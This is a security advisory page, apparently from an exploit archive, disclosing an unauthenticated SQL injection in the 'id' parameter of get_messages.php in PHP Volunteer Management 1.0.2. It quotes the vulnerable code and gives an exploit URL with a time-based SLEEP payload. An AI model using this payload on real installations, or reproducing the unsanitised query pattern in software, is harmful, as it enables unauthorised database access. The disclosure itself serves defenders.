PHP Volunteer Management 1.0.2 SQL Injection

2012.05.01
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title: PHP Volunteer Management (get_messages.php) SQL Injection Vulnerabilities # # Author: eidelweiss # Twitter: @AriosRandy # Website: www.eidelweiss.info # Software Site: https://sourceforge.net/projects/phpvolunteer/ # Version: 1.0.2 # Category: webapp (php) # Greetz: Devilzc0de, exploit-db, G13 (first vuln Disclose http://www.exploit-db.com/exploits/18788/) and YOU !!! ##### ToC ##### 0x01 Description 0x02 vuln c0de ##### 0x01 Description ##### This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql. ##### 0x02 vuln c0de ##### ---------------Vulnerability------------------- get_messages.php == <?php define('INCLUDE_CHECK',true); include '../../../config/connect.php'; $id = $_GET['id']; $query = "SELECT * FROM messages, volunteers WHERE message_to_id = '$id' AND message_from_id = volunteer_id ORDER BY message_state, message_id"; $mysql_result = mysql_query($query); $result = array(); while ($row = mysql_fetch_assoc($mysql_result)) { $result[] = $row; } $data = json_encode($result); print_r($data); ?> == The 'id' parameter is vulnerable to SQL Injection. No authentication is needed. ----------Exploit----------------------------------- http://localhost/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 ------------PoC--------------------------- http://localhost/mods/messages/data/get_messages.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10 ##### E0F #####

References:

https://sourceforge.net/projects/phpvolunteer/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top